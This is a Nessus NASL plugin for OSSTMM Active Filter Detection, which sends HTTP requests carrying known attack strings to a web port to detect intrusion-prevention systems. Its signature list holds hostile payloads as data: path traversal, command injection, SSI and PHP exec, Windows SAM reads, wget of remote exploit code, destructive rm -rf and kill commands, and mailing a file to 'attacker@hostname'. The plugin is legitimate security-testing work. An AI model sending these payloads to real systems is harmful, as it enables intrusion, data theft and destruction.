# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
# 
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU General Public License for more details.
# 
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA  02111-1307, USA.
# 
#
#
# This script is based on the osstmm-afd program released
# by Ian Latter of Pure Hacking in 2005 (pre OSSTMM v3.0)
#
# see http://purehacking.com/afd/
# see http://isecom.org/projects/toolsandtemplates.shtml
#
#
# Copyright 2005 by Ian Latter <ilatter@midnightcode.com> 
#
#
# Future-proof:  This module should be inverted so that it reports
#                a security warning if there is no active filtering
#                detected, and a security note if there is.
#

# Global fault description
global_var desc, desc_fp;
desc["english"] = "
Active Filter Detection is one step, according to the Open
Source Security Testing Methodology Manual, that security
auditors should perform to identify the presence of
Intrusion Prevention Systems and other technologies that
would directly impact the quality of a security assessment.

Signatures for this probe were derived from the following -
See: http://www.cgisecurity.com/papers/fingerprint-port80.txt
See: http://www.bleedingsnort.com/bleeding-all.rules

OSSTMM and AFD details can be found at these sites -
See: http://www.osstmm.org/
See: http://www.purehacking.com/afd/

Solution : As the remote site appears to be running IPS/IDP,
test results from this Nessus assessment are likely to be
incomplete and/or incorrect.  Disable IPS/IDP technologies
protecting the target, if further testing from this
perspective is desired.

Risk factor : None";
desc_fp = "

Warning : This security note was generated on the first
attempt to access the web services port on this host.  It
is therefore more than likely that this security event is a
false positive.";

# Generic description switch
if(description)
{
  name["english"] = "AFD - OSSTMM Active Filter Detection";
  script_name(english:name["english"]);
  script_id(99999);
  script_version ("$Revision: 0.7.1 $");

  script_description(english:desc["english"]);

  summary["english"] = "IPS/IDP technologies appear to be protecting the target";
  script_summary(english:summary["english"]);

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"AFD was written by Ian Latter of Pure Hacking, then re-written for NASL");

  family["english"] = "General";
  script_family(english:family["english"]);
  script_dependencies("find_service_3digits.nasl", "doublecheck_std_services.nasl");
  script_require_ports("Services/www", 80);

  script_add_preference(name: "Socket timeout value (in seconds) :", value: "5", type: "entry");
  script_add_preference(name: "HTTP Agent :", value: "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)", type: "entry");
  script_add_preference(name: "HTTP Path :", value: "/", type: "entry");
  script_add_preference(name: "HTTP Referer :", value: "", type: "entry");
  script_add_preference(name: "HTTP Virtual Host :", value: "", type: "entry");

  exit(0);
}

display_report = COMMAND_LINE || experimental_scripts || report_paranoia > 1 || report_verbosity > 1;

include('global_settings.inc');
include('misc_func.inc');


# User defined global values
global_var script_timeout, socket_timeout;
script_timeout = 300;
socket_timeout = 5;


# Config default global values
global_var dflt_http_agent,   dflt_http_path;
global_var dflt_http_referer, dflt_http_vhost;
dflt_http_agent    = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 98)";
dflt_http_path     = "/";
dflt_http_referer  = "";
dflt_http_vhost    = get_host_name;


# Config defined global values
global_var cfg_socket_timeout, cfg_http_agent, cfg_http_path;
global_var cfg_http_referer,   cfg_http_vhost;
local_var  tmp_var;
cfg_socket_timeout = script_get_preference("Socket timeouts (in seconds) :");
cfg_http_agent     = script_get_preference("HTTP Agent :");
cfg_http_path      = script_get_preference("HTTP Path :");
cfg_http_referer   = script_get_preference("HTTP Referer :");
cfg_http_vhost     = script_get_preference("HTTP Virtual Host :");
tmp_val = int(cfg_socket_timeout);
if(tmp_val > 1 && tmp_val < 30) {
  socket_timeout = tmp_val;
}
if(strlen(cfg_http_agent) < 1)   cfg_http_agent   = dflt_http_agent;
if(strlen(cfg_http_path) < 1)    cfg_http_path    = dflt_http_path;
if(strlen(cfg_http_referer) < 1) cfg_http_referer = dflt_http_referer;
if(strlen(cfg_http_vhost) < 1)   cfg_http_vhost   = dflt_http_vhost;

 
# System defined global values
global_var port;
port = get_kb_item("Services/www");
if(! port) {
  port = 80;
}
if(! get_port_state(port)) {
  exit(0);
}


# Signature database
global_var signatures, delim;
delim = "<::>";
signatures = '
0<::>/
0<::>../../../../etc/motd
0<::>ls%20-al|
0<::>../../../../etc/motd%00html
0<::>../../../../bin/ls|
0<::>../../../../bin/ls%20-al%20/etc|
0<::>cat%20access_log|grep%20-i%20"lame"
0<::>id;uname -a
0<::>echo "your hax0red h0 h0" >> /etc/motd
0<::><b>Hi%20mom%20I\'m%20Bold!</b>
0<::><!%20--#include%20virtual="http://host2/fake-article.html"-->
0<::><!%20#<!--#exec%20cmd="id"-->
0<::><!%20--#include%20virtual=".htpasswd"-->
0<::><? passthru("id");?>
0<::><?phpinfo();?>
0<::>`id`
0<::>../../../../bin/ls%20-al|
0<::>ls%20-al;
0<::>../../WINNT/system32/cmd.exe?dir+c:\
0<::>../../WINNT/system32/cmd.exe?dir+d:\
0<::>../../WINNT/system32/cmd.exe?dir+e:\
0<::>type+c:\\winnt\\repair\\sam._
0<::>type+c:winnt\\repair\\sam._
0<::>type+c:\\winnt\\repair\\sam
0<::>type+c:winnt\\repair\\sam
0<::>id;
0<::>../../../../bin/id|
0<::>../../../../path/to-wget/wget%20http://host2/Phantasmp.c
0<::>wget%20http://www.hwa-security.net/Phantasmp.c;
0<::>../../../../bin/cat%20/etc/motd|
0<::>cat%20/etc/motd;
0<::>../../../../bin/echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt|
0<::>echo%20"fc-#kiwis%20was%20here"%20>>%200day.txt;
0<::>../../../../bin/ps%20-aux|
0<::>ps%20-aux;
0<::>../../../../bin/uname%20-a|
0<::>uname%20-a;
0<::>../../../../bin/cc%20Phantasmp.c|
0<::>gcc%20Phantasmp.c;./a.out%20-p%2031337;
0<::>../../../../usr/X11R6/bin/xterm%20-display%20192.168.22.1|
0<::>Xeyes%20-display%20192.168.22.1;
1<::>../../../../bin/rm%20-rf%20*|
1<::>rm%20-rf%20*;
1<::>killall%20init;
1<::>kill%20-9%200
1<::>../../../../bin/chmod%20777%20index.html|
1<::>chmod%20777%20index.html;
1<::>../../../../bin/chown%20zeno%20/etc/master.passwd|
1<::>../../../../bin/chown%20zeno%20/etc/master.passwd|
1<::>chsh%20/bin/sh;
1<::>../../../../bin/chgrp%20nobody%20/etc/shadow|
1<::>../../../../bin/mail%20attacker@hostname%20<<%20/etc/motd|
1<::>mail%20attacker@hostname%20<<%20/etc/motd;
0<::>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
0<::>abcdefghijklmnopqrstuvqxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvqxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvqxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvqxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890
0<::>THCOWNZIIS!
0<::>/viewtopic.php?&highlight=\'.system(
0<::>/viewtopic.php?&highlight=\'.mysql_query(
0<::>/viewtopic.php?&highlight=\'.fwrite(fopen(
0<::>.php?=http|3a|//cmd=
0<::>/modules.php?name=Search&instory=
0<::>/modules.php?name=UNION&name=SELECT
0<::>/modules.php?name=SCRIPT&name=<SCRIPT>
0<::>forumdisplay.php?comma=.system..
0<::>/scr2/command.php?IP=127.0.0.1&Port1=999
0<::>X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
0<::>/
';


# Signature hurler
function sig_hurler(port, sig)
{
  local_var fd, err, req;
  err = 1;
  req = "";

  # Prepare request
  req = strcat(     'GET ', cfg_http_path, sig, ' HTTP/1.1\r\n');
  req = strcat(req, 'Host: ', cfg_http_vhost, '\r\n');
  if(strlen(cfg_http_referer) > 0) {
    req = strcat(req, 'Referer: ',    cfg_http_referer, '\r\n');
  }
  if(strlen(cfg_http_cfg_http_agent) > 0) {
    req = strcat(req, 'User-agent: ', cfg_http_agent,   '\r\n');
  }
  req = strcat(req, 'Pragma: no-cache\r\n');
  req = strcat(req, 'Accept: */*\r\n');
  req = strcat(req, '\r\n');

  # -- STEP 1 --  CONNECT TO THE TARGET DEVICE
  fd = open_sock_tcp(port, timeout: socket_timeout);
  if (! fd) {
    return err;
  }
  err++;

  # -- STEP 2 --  DISPATCH SIGNATURE
  if(send(socket: fd, data: req) <= 0) {
    close(fd);
    return err;
  }
  if (! fd) {
    return err;
  }
  err++;
  
  # -- STEP 3 --  SEEK RETURNING TRAFFIC
  if(recv(socket: fd, min: 1, length: 1, timeout: socket_timeout) <= 0) {
    close(fd);
    return err;
  }
  if (! fd) {
    return err;
  }
  err++;

  # -- STEP 4 --  CLOSE CONNECTION
  if (! fd) {
    return err;
  }
  if(close(fd) != 0) {
    return err;
  }

  return 0;
}



# Core program logic
local_var sig_array, total_sigs, count_sigs;
local_var sig_danger, sig_param, ret_err;

sig_array  = split(signatures);
total_sigs = max_index(sig_array) - 1;
count_sigs = 0;

script_timeout(script_timeout);
start_denial();

foreach sig (sig_array) {
  scanner_status(current: count_sigs, total: total_sigs);
  sig_ent = split(sig, sep: delim);
  if(strlen(chomp(sig_ent[1])) > 0) {
    sig_danger = str_replace(string: sig_ent[0], find: delim, replace: '');
    sig_param  = str_replace(string: sig_ent[1], find: '\n',  replace: '');
    if(debug_level) {
      display('New signature [', count_sigs, '/', total_sigs, ']:\n');
      display(' -- Dangerous? [', sig_danger, ']\n');
      display(' -- Paramater  [', sig_param, ']\n');
    }
    if(!safe_checks() || (safe_checks() && ! int(sig_danger))) {
      ret_err = sig_hurler(port: port, sig: sig_param);
      if(ret_err > 0) {
        if(debug_level) {
          display(' -- error      [', ret_err, ']\n');
        }
        if(count_sigs == 1) {
          desc["english"] = strcat(desc["english"], desc_fp);
        }
        security_note(data: desc["english"], proto: "tcp");
        set_kb_item(name:"general/active-filter-detected", value:TRUE);
        alive = end_denial();
        if(!alive) {
          set_kb_item(name:"general/active-filter-validated", value:TRUE);
        } else {
          set_kb_item(name:"general/active-filter-validated", value:FALSE);
        }
        exit();
      }
    }
  }
  count_sigs++;
}
set_kb_item(name:"general/active-filter-detected", value:FALSE);
end_denial();